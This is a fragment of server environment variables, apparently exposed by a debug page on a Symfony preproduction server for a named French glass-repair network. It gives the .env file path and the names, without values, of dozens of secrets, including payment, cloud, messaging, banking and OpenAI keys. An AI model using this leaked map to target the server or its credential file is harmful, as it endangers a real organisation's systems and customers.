SERVER_ADMIN
"[no address given]"
SERVER_NAME
"midasglass.preprod.reseauglass.fr"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
""
SERVER_SOFTWARE
"Apache"
SSL_TLS_SNI
"midasglass.preprod.reseauglass.fr"
SYMFONY_DOTENV_PATH
"/home/reseauglass/preprod/.env"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,MESSENGER_TRANSPORT_DSN,DATABASE_URL,MAILER_DSN,LOCK_DSN,STRIPE_API_KEY,STRIPE_ENDPOINT_SECRET,STRIPE_ID_TAXE,APP_PRICE,YOUSIGN_API_URI,YOUSIGN_PRODUCTION,YOUSIGN_TOKEN,YOUSIGN_API_V3_TOKEN,YOUSIGN_WEBHOOK,YOUSIGN_URL_SIGN,SIRENE_JETON_TOKEN,SIRENE_API_URI,SIRENE_KEY_CONSUME,SIRENE_KEY_SECRET,SIRENE_API_KEY,GOOGLE_API_KEY,GOOGLE_APPLICATION_CREDENTIALS,GOOGLE_RECAPTCHA,GOOGLE_USE_BUCKET,GOOGLE_MAIL_CREDENTIALS,OUTLOOK_CLIENT_ID,OUTLOOK_CLIENT_SECRET,OUTLOOK_CLIENT_VALUE,SES_AWS_ACCESS_KEY_ID,SES_AWS_SECRET_ACCESS_KEY,MERCURE_URL,MERCURE_PUBLIC_URL,MERCURE_PUBLISH_URL,MERCURE_TRANSPORT_URL,MERCURE_JWT_SECRET,MERCURE_PUBLISHER_JWT_ALG,MERCURE_SUBSCRIBER_JWT_ALG,JWT_SECRET_KEY,JWT_PUBLIC_KEY,JWT_PASSPHRASE,ENABLE_MERCURE_SUBSCRIBING,ENABLE_MERCURE_PUSH,TWILIO_DSN,TWILIO_WHATSAPP_DSN,TWILIO_WHATSAPP_FROM,TWILIO_SMS_FROM,TWILIO_ACCOUNT_SID,TWILIO_AUTH_TOKEN,TWILIO_SMS_FEATURE_ENABLED,TWILIO_WHATSAPP_FEATURE_ENABLED,SIDEXA_ITR_ID,SIDEXA_LOGIN,SIDEXA_PASSWD,SIDEXA_AGREMENT,SIDEXA_REST_API,SIDEXA_FEATURE_ENABLED,SIDEXA_GATEWAY_ENABLED,SIDEXA_MIRROR_ENABLED,RINGOVER_API_KEY_RESEAUGLASS,RINGOVER_API_KEY_HELLOGLASS,RINGOVER_API_KEY_ADEL,CLEARBUS_ENABLED,CLEARBUS_TRACE_ENABLED,CLEARBUS_SERVICE_CALL_ENABLED,CLEARBUS_ID,CLEARBUS_PASSWORD,CLEARBUS_TOTP_KEY,BRIDGE_ENABLED,BRIDGE_API_CALLS_ENABLED,BRIDGE_API_SANDBOX_MODE,BRIDGE_API_URI,BRIDGE_API_CLIENT_ID,BRIDGE_API_CLIENT_SECRET,BRIDGE_WEBHOOK_TRUSTED_IPS,BRIDGE_WEBHOOK_ITEM_CREATED_SECRET,BRIDGE_WEBHOOK_ITEM_REFRESHED_SECRET,BRIDGE_WEBHOOK_ACCOUNT_CREATED_SECRET,BRIDGE_WEBHOOK_ACCOUNT_UPDATED_SECRET,CLEARBUS_API_URL,CLEARBUS_API_LOGIN,CLEARBUS_API_PASSWORD,CLEARBUS_COURIERS,CLEARBUS_OUTPUTS,CORS_ALLOW_ORIGIN,RAPIDAPI_HOST,RAPIDAPI_KEY,NEXT_PUBLIC_API_URL,ASSET_BASE_URL,OPENAI_API_KEY,OPENAI_MODEL"
USER
"www-data"
proxy-nokeepalive
"1"